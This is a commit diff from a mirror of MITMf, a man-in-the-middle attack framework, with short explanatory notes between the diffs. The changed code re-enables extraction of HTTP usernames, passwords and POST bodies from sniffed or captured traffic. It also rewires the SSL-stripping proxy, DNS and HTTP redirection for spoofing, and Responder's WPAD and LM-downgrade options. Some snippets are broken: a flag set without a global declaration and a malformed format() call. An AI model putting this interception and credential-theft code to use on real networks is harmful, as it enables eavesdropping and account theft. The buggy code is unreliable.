Mirror of https://github.com/byt3bl33d3r/MITMf.git
Fixed bug where Net-Creds wouldn't parse URLs and HTTP data when reading from a pcap
The active packet filtering engine and the proxy + servers are now mutually exclusive: only one of them can be started at a time (their iptables rules conflict)
This commit is contained in:
parent 28fc081068
commit 986b2b851f
9 changed files with 179 additions and 160 deletions
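For context before the diffs: the pcap fix hinges on a new module-level parsing_pcap flag in core/netcreds.py that other_parser() checks before printing URLs and HTTP data. Below is a minimal sketch of that pattern (the pkt_parser stub is hypothetical; the real parser lives in core/netcreds.py), with one caveat worth noting: an assignment like parsing_pcap=True inside a method only binds a local name unless the global is declared, so the sketch declares it explicitly.

    from scapy.all import PcapReader

    parsing_pcap = False  # module-level switch: True while reading from a capture file

    def pkt_parser(pkt):
        pass  # stand-in for the real packet parser

    def parse_pcap(pcap):
        global parsing_pcap   # without this, parsing_pcap = True would bind a local
        parsing_pcap = True
        for pkt in PcapReader(pcap):
            pkt_parser(pkt)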
core/configwatcher.py
@@ -21,7 +21,7 @@ import pyinotify
 import threading
 from configobj import ConfigObj

-class ConfigWatcher(pyinotify.ProcessEvent):
+class ConfigWatcher(pyinotify.ProcessEvent, object):

     @property
     def config(self):
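Adding object to the bases presumably makes ConfigWatcher a new-style class under Python 2, which matters for the @property just below: on an old-style class, assigning to a property attribute is silently accepted and shadows the getter instead of raising AttributeError. A hypothetical demonstration:

    class OldStyle:                # old-style in Python 2: no object in the MRO
        @property
        def config(self):
            return 'from getter'

    o = OldStyle()
    o.config = 'shadowed'          # no setter defined, yet this succeeds
    print o.config                 # -> 'shadowed'; the getter is bypassed from now on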
178	core/netcreds.py
@@ -41,6 +41,8 @@ NTLMSSP3_re = 'NTLMSSP\x00\x03\x00\x00\x00.+'
 # Prone to false+ but prefer that to false-
 http_search_re = '((search|query|&q|\?q|search\?p|searchterm|keywords|keyword|command|terms|keys|question|kwd|searchPhrase)=([^&][^&]*))'

+parsing_pcap = False
+
 class NetCreds:

     version = "1.0"
@@ -51,16 +53,65 @@ class NetCreds:
         except Exception as e:
             if "Interrupted system call" in e: pass

-    def start(self, interface, ip, pcap):
-        if pcap:
-            for pkt in PcapReader(pcap):
-                pkt_parser(pkt)
-            sys.exit()
-        else:
+    def start(self, interface, ip):
         t = threading.Thread(name='NetCreds', target=self.sniffer, args=(interface, ip,))
         t.setDaemon(True)
         t.start()

+    def parse_pcap(self, pcap):
+        parsing_pcap=True
+
+        for pkt in PcapReader(pcap):
+            pkt_parser(pkt)
+
+        sys.exit()
+
+def frag_remover(ack, load):
+    '''
+    Keep the FILO OrderedDict of frag loads from getting too large
+    3 points of limit:
+        Number of ip_ports < 50
+        Number of acks per ip:port < 25
+        Number of chars in load < 5000
+    '''
+    global pkt_frag_loads
+
+    # Keep the number of IP:port mappings below 50
+    # last=False pops the oldest item rather than the latest
+    while len(pkt_frag_loads) > 50:
+        pkt_frag_loads.popitem(last=False)
+
+    # Loop through a deep copy dict but modify the original dict
+    copy_pkt_frag_loads = copy.deepcopy(pkt_frag_loads)
+    for ip_port in copy_pkt_frag_loads:
+        if len(copy_pkt_frag_loads[ip_port]) > 0:
+            # Keep 25 ack:load's per ip:port
+            while len(copy_pkt_frag_loads[ip_port]) > 25:
+                pkt_frag_loads[ip_port].popitem(last=False)
+
+    # Recopy the new dict to prevent KeyErrors for modifying dict in loop
+    copy_pkt_frag_loads = copy.deepcopy(pkt_frag_loads)
+    for ip_port in copy_pkt_frag_loads:
+        # Keep the load less than 75,000 chars
+        for ack in copy_pkt_frag_loads[ip_port]:
+            # If load > 5000 chars, just keep the last 200 chars
+            if len(copy_pkt_frag_loads[ip_port][ack]) > 5000:
+                pkt_frag_loads[ip_port][ack] = pkt_frag_loads[ip_port][ack][-200:]
+
+def frag_joiner(ack, src_ip_port, load):
+    '''
+    Keep a store of previous fragments in an OrderedDict named pkt_frag_loads
+    '''
+    for ip_port in pkt_frag_loads:
+        if src_ip_port == ip_port:
+            if ack in pkt_frag_loads[src_ip_port]:
+                # Make pkt_frag_loads[src_ip_port][ack] = full load
+                old_load = pkt_frag_loads[src_ip_port][ack]
+                concat_load = old_load + load
+                return OrderedDict([(ack, concat_load)])
+
+    return OrderedDict([(ack, load)])
+
 def pkt_parser(pkt):
     '''
     Start parsing packets here
@@ -127,53 +178,7 @@ def pkt_parser(pkt):
             telnet_logins(src_ip_port, dst_ip_port, load, ack, seq)

         # HTTP and other protocols that run on TCP + a raw load
-        other_parser(src_ip_port, dst_ip_port, full_load, ack, seq, pkt)
-
-def frag_remover(ack, load):
-    '''
-    Keep the FILO OrderedDict of frag loads from getting too large
-    3 points of limit:
-        Number of ip_ports < 50
-        Number of acks per ip:port < 25
-        Number of chars in load < 5000
-    '''
-    global pkt_frag_loads
-
-    # Keep the number of IP:port mappings below 50
-    # last=False pops the oldest item rather than the latest
-    while len(pkt_frag_loads) > 50:
-        pkt_frag_loads.popitem(last=False)
-
-    # Loop through a deep copy dict but modify the original dict
-    copy_pkt_frag_loads = copy.deepcopy(pkt_frag_loads)
-    for ip_port in copy_pkt_frag_loads:
-        if len(copy_pkt_frag_loads[ip_port]) > 0:
-            # Keep 25 ack:load's per ip:port
-            while len(copy_pkt_frag_loads[ip_port]) > 25:
-                pkt_frag_loads[ip_port].popitem(last=False)
-
-    # Recopy the new dict to prevent KeyErrors for modifying dict in loop
-    copy_pkt_frag_loads = copy.deepcopy(pkt_frag_loads)
-    for ip_port in copy_pkt_frag_loads:
-        # Keep the load less than 75,000 chars
-        for ack in copy_pkt_frag_loads[ip_port]:
-            # If load > 5000 chars, just keep the last 200 chars
-            if len(copy_pkt_frag_loads[ip_port][ack]) > 5000:
-                pkt_frag_loads[ip_port][ack] = pkt_frag_loads[ip_port][ack][-200:]
-
-def frag_joiner(ack, src_ip_port, load):
-    '''
-    Keep a store of previous fragments in an OrderedDict named pkt_frag_loads
-    '''
-    for ip_port in pkt_frag_loads:
-        if src_ip_port == ip_port:
-            if ack in pkt_frag_loads[src_ip_port]:
-                # Make pkt_frag_loads[src_ip_port][ack] = full load
-                old_load = pkt_frag_loads[src_ip_port][ack]
-                concat_load = old_load + load
-                return OrderedDict([(ack, concat_load)])
-
-    return OrderedDict([(ack, load)])
+        other_parser(src_ip_port, dst_ip_port, full_load, ack, seq, pkt, True)

 def telnet_logins(src_ip_port, dst_ip_port, load, ack, seq):
     '''
@@ -530,7 +535,7 @@ def irc_logins(full_load, pkt):
             msg = 'IRC pass: %s' % pass_search2.group(1)
     return msg

-def other_parser(src_ip_port, dst_ip_port, full_load, ack, seq, pkt):
+def other_parser(src_ip_port, dst_ip_port, full_load, ack, seq, pkt, verbose):
     '''
     Pull out pertinent info from the parsed HTTP packet data
     '''
@@ -545,44 +550,51 @@ def other_parser(src_ip_port, dst_ip_port, full_load, ack, seq, pkt):
     else:
         host = ''

-    #if http_line != None:
-    #    method, path = parse_http_line(http_line, http_methods)
-    #    http_url_req = get_http_url(method, host, path, headers)
-    #    if http_url_req != None:
-    #        printer(src_ip_port, None, http_url_req)
+    if parsing_pcap is True:
+
+        if http_line != None:
+            method, path = parse_http_line(http_line, http_methods)
+            http_url_req = get_http_url(method, host, path, headers)
+            if http_url_req != None:
+                if verbose == False:
+                    if len(http_url_req) > 98:
+                        http_url_req = http_url_req[:99] + '...'
+                printer(src_ip_port, None, http_url_req)

     # Print search terms
     searched = get_http_searches(http_url_req, body, host)
     if searched:
         printer(src_ip_port, dst_ip_port, searched)

-    #We dont need this cause its being taking care of by the proxy
-
     # Print user/pwds
-    #if body != '':
-    #    user_passwd = get_login_pass(body)
-    #    if user_passwd != None:
-    #        try:
-    #            http_user = user_passwd[0].decode('utf8')
-    #            http_pass = user_passwd[1].decode('utf8')
-    #            # Set a limit on how long they can be prevent false+
-    #            if len(http_user) > 75 or len(http_pass) > 75:
-    #                return
-    #            user_msg = 'HTTP username: %s' % http_user
-    #            printer(src_ip_port, dst_ip_port, user_msg)
-    #            pass_msg = 'HTTP password: %s' % http_pass
-    #            printer(src_ip_port, dst_ip_port, pass_msg)
-    #        except UnicodeDecodeError:
-    #            pass
+    if body != '':
+        user_passwd = get_login_pass(body)
+        if user_passwd != None:
+            try:
+                http_user = user_passwd[0].decode('utf8')
+                http_pass = user_passwd[1].decode('utf8')
+                # Set a limit on how long they can be prevent false+
+                if len(http_user) > 75 or len(http_pass) > 75:
+                    return
+                user_msg = 'HTTP username: %s' % http_user
+                printer(src_ip_port, dst_ip_port, user_msg)
+                pass_msg = 'HTTP password: %s' % http_pass
+                printer(src_ip_port, dst_ip_port, pass_msg)
+            except UnicodeDecodeError:
+                pass

     # Print POST loads
     # ocsp is a common SSL post load that's never interesting
-    #if method == 'POST' and 'ocsp.' not in host:
-    #    try:
-    #        msg = 'POST load: %s' % body.encode('utf8')
-    #        printer(src_ip_port, None, msg)
-    #    except UnicodeDecodeError:
-    #        pass
+    if method == 'POST' and 'ocsp.' not in host:
+        try:
+            if verbose == False and len(body) > 99:
+                # If it can't decode to utf8 we're probably not interested in it
+                msg = 'POST load: %s...' % body[:99].encode('utf8')
+            else:
+                msg = 'POST load: %s' % body.encode('utf8')
+            printer(src_ip_port, None, msg)
+        except UnicodeDecodeError:
+            pass

     # Kerberos over TCP
     decoded = Decode_Ip_Packet(str(pkt)[14:])
@@ -904,7 +916,7 @@ def get_login_pass(body):

 def printer(src_ip_port, dst_ip_port, msg):
     if dst_ip_port != None:
-        print_str = '[{} > {}] {}'.format(src_ip_port, dst_ip_port, msg)
+        print_str = '[{} > {}] {}'.format((src_ip_port, dst_ip_port, msg))
         # All credentials will have dst_ip_port, URLs will not

         log.info("{}".format(print_str))
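With these netcreds.py changes, reading a capture becomes its own entry point that runs before any sniffing or proxying starts, and parse_pcap() ends in sys.exit(), matching the -r help text ('Parse specified pcap for credentials and exit'). A hypothetical invocation (capture.pcap is a placeholder; -i stays mandatory because of the new required=True):

    python mitmf.py -i eth0 -r capture.pcap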
core/packetfilter.py
@@ -1,5 +1,3 @@
-import threading
-
 from core.utils import set_ip_forwarding, iptables
 from core.logger import logger
 from scapy.all import *
@@ -21,9 +19,7 @@ class PacketFilter:
         self.nfqueue = NetfilterQueue()
         self.nfqueue.bind(1, self.modify)

-        t = threading.Thread(name='packetparser', target=self.nfqueue.run)
-        t.setDaemon(True)
-        t.start()
+        self.nfqueue.run()

     def modify(self, pkt):
         #log.debug("Got packet")
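Note that self.nfqueue.run() now blocks the calling thread instead of running on a daemon thread, which is why mitmf.py (below) wraps pfilter.start() in a try/except KeyboardInterrupt. A minimal sketch of that blocking pattern, assuming the NetfilterQueue package is installed and an iptables rule already directs traffic to queue 1:

    from netfilterqueue import NetfilterQueue

    def modify(pkt):
        pkt.accept()              # pass the packet through unmodified

    nfqueue = NetfilterQueue()
    nfqueue.bind(1, modify)       # queue number 1, as in the diff
    try:
        nfqueue.run()             # blocks until interrupted
    except KeyboardInterrupt:
        nfqueue.unbind()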
core/proxyplugins.py
@@ -108,6 +108,7 @@ class ProxyPlugins:
         log.debug("hooking {}()".format(fname))
         #calls any plugin that has this hook
+        try:
             if self.plugin_mthds:
                 for f in self.plugin_mthds[fname]:
                     a = f(**args)
                     if a != None: args = a
75	mitmf.py
@@ -52,7 +52,7 @@ parser = argparse.ArgumentParser(description="MITMf v{} - '{}'".format(mitmf_ver
 #add MITMf options
 sgroup = parser.add_argument_group("MITMf", "Options for MITMf")
 sgroup.add_argument("--log-level", type=str,choices=['debug', 'info'], default="info", help="Specify a log level [default: info]")
-sgroup.add_argument("-i", dest='interface', type=str, help="Interface to listen on")
+sgroup.add_argument("-i", dest='interface', required=True, type=str, help="Interface to listen on")
 sgroup.add_argument("-c", dest='configfile', metavar="CONFIG_FILE", type=str, default="./config/mitmf.conf", help="Specify config file to use")
 sgroup.add_argument("-p", "--preserve-cache", action="store_true", help="Don't kill client/server caching")
 sgroup.add_argument("-r", '--read-pcap', type=str, help='Parse specified pcap for credentials and exit')
@@ -73,6 +73,15 @@ options = parser.parse_args()
 #Set the log level
 logger().log_level = logging.__dict__[options.log_level.upper()]

+from core.logger import logger
+formatter = logging.Formatter("%(asctime)s %(message)s", datefmt="%Y-%m-%d %H:%M:%S")
+log = logger().setup_logger("MITMf", formatter)
+
+from core.netcreds import NetCreds
+
+if options.read_pcap:
+    NetCreds().parse_pcap(options.read_pcap)
+
 #Check to see if we supplied a valid interface, pass the IP and MAC to the NameSpace object
 from core.utils import get_ip, get_mac, shutdown
 options.ip = get_ip(options.interface)
@@ -80,33 +89,18 @@ options.mac = get_mac(options.interface)

 settings.Config.populate(options)

-from core.logger import logger
-formatter = logging.Formatter("%(asctime)s %(message)s", datefmt="%Y-%m-%d %H:%M:%S")
-log = logger().setup_logger("MITMf", formatter)
-
 log.debug("MITMf started: {}".format(sys.argv))

-#Start Net-Creds
-from core.netcreds import NetCreds
-NetCreds().start(options.interface, options.ip, options.read_pcap)
+print "[*] MITMf v{} - '{}'".format(mitmf_version, mitmf_codename)
+
+NetCreds().start(options.interface, options.ip)
+print "|"
+print "|_ Net-Creds v{} online".format(NetCreds.version)

-from core.sslstrip.CookieCleaner import CookieCleaner
 from core.proxyplugins import ProxyPlugins
-from core.sslstrip.StrippingProxy import StrippingProxy
-from core.sslstrip.URLMonitor import URLMonitor
-
-URLMonitor.getInstance().setFaviconSpoofing(options.favicon)
-URLMonitor.getInstance().setCaching(options.preserve_cache)
-CookieCleaner.getInstance().setEnabled(options.killsessions)
-
-strippingFactory = http.HTTPFactory(timeout=10)
-strippingFactory.protocol = StrippingProxy
-
-reactor.listenTCP(options.listen_port, strippingFactory)
-
 ProxyPlugins().all_plugins = plugins
-
-print "[*] MITMf v{} - '{}'".format(mitmf_version, mitmf_codename)

 for plugin in plugins:

     #load only the plugins that have been called at the command line
@@ -126,25 +120,43 @@ for plugin in plugins:
         for line in xrange(0, len(plugin.tree_info)):
             print "| |_ {}".format(plugin.tree_info.pop())

-    plugin.reactor(strippingFactory)
     plugin.start_config_watch()

 print "|"
-print "|_ Sergio-Proxy v0.2.1 online"
-print "|_ SSLstrip v0.9 by Moxie Marlinspike online"
-print "|"

 if options.filter:
     from core.packetfilter import PacketFilter
     pfilter = PacketFilter(options.filter)
-    pfilter.start()
     print "|_ PacketFilter online"
-    print "| |_ Applying filter {} to incoming packets".format(options.filter)
+    print " |_ Applying filter {} to incoming packets".format(options.filter)
+    try:
+        pfilter.start()
+    except KeyboardInterrupt:
+        pfilter.stop()
+        shutdown()

-print "|_ Net-Creds v{} online".format(NetCreds.version)
+else:
+    from core.sslstrip.CookieCleaner import CookieCleaner
+    from core.sslstrip.StrippingProxy import StrippingProxy
+    from core.sslstrip.URLMonitor import URLMonitor
+
+    URLMonitor.getInstance().setFaviconSpoofing(options.favicon)
+    URLMonitor.getInstance().setCaching(options.preserve_cache)
+    CookieCleaner.getInstance().setEnabled(options.killsessions)
+
+    strippingFactory = http.HTTPFactory(timeout=10)
+    strippingFactory.protocol = StrippingProxy
+
+    reactor.listenTCP(options.listen_port, strippingFactory)
+
+    for plugin in plugins:
+        if vars(options)[plugin.optname] is True:
+            plugin.reactor(strippingFactory)
+
+    print "|_ Sergio-Proxy v0.2.1 online"
+    print "|_ SSLstrip v0.9 by Moxie Marlinspike online"

 #Start mitmf-api
 from core.mitmfapi import mitmfapi
 print "|"
 print "|_ MITMf-API online"
 mitmfapi().start()
@@ -167,7 +179,4 @@ print "|_ SMB server online\n"
 reactor.run()
 print "\n"

-if options.filter:
-    pfilter.stop()
-
 shutdown()
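On the 'iptables conflicts' behind the new either/or startup: the proxy path NATs HTTP traffic to a local listen port while the packet filter claims packets for userspace via NFQUEUE, so the two rule sets would fight over the same traffic; this is also why the Spoof and SSLstripPlus hunks below skip their DNS/HTTP rules when options.filter is set. The rules below are illustrative assumptions only (the real ones are managed by the iptables class in core/utils.py; 10000 stands in for the default listen port):

    import os

    # Proxy + servers mode: redirect HTTP to the local SSLstrip proxy
    os.system('iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000')

    # Packet filter mode: hand forwarded packets to a userspace queue instead
    os.system('iptables -I FORWARD -j NFQUEUE --queue-num 1')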
plugins/plugin.py
@@ -31,6 +31,7 @@ class Plugin(ConfigWatcher):

     def __init__(self, parser):
         '''Passed the options namespace'''
+
         if self.desc:
             sgroup = parser.add_argument_group(self.name, self.desc)
         else:
plugins/responder.py
@@ -91,5 +91,5 @@ class Responder(Plugin):
         options.add_argument('--fingerprint', dest="finger", action="store_true", help="Fingerprint hosts that issued an NBT-NS or LLMNR query")
         options.add_argument('--lm', dest="lm", action="store_true", help="Force LM hashing downgrade for Windows XP/2003 and earlier")
         options.add_argument('--wpad', dest="wpad", action="store_true", help="Start the WPAD rogue proxy server")
-        options.add_argument('--forcewpadauth', dest="forcewpadauth", action="store_true", help="Set this if you want to force NTLM/Basic authentication on wpad.dat file retrieval. This might cause a login prompt in some specific cases. Therefore, default value is False")
-        options.add_argument('--basic', dest="basic", action="store_true", help="Set this if you want to return a Basic HTTP authentication. If not set, an NTLM authentication will be returned")
+        options.add_argument('--forcewpadauth', dest="forcewpadauth", action="store_true", help="Force NTLM/Basic authentication on wpad.dat file retrieval (might cause a login prompt)")
+        options.add_argument('--basic', dest="basic", action="store_true", help="Return a Basic HTTP authentication. If not set, an NTLM authentication will be returned")
plugins/spoof.py
@@ -70,7 +70,7 @@ class Spoof(Plugin):

         if options.dns:
             self.tree_info.append('DNS spoofing enabled')
-            if iptables().dns is False:
+            if iptables().dns is False and options.filter is False:
                 iptables().DNS(self.config['MITMf']['DNS']['port'])

         if not options.arp and not options.icmp and not options.dhcp and not options.dns:
@@ -78,7 +78,7 @@ class Spoof(Plugin):

         set_ip_forwarding(1)

-        if iptables().http is False:
+        if iptables().http is False and options.filter is False:
             iptables().HTTP(options.listen_port)

         for protocol in self.protocol_instances:
@@ -33,7 +33,7 @@ class SSLstripPlus(Plugin):
         from core.servers.DNS import DNSChef
         from core.utils import iptables

-        if iptables().dns is False:
+        if iptables().dns is False and options.filter is False:
             iptables().DNS(self.config['MITMf']['DNS']['port'])

         URLMonitor.getInstance().setHstsBypass()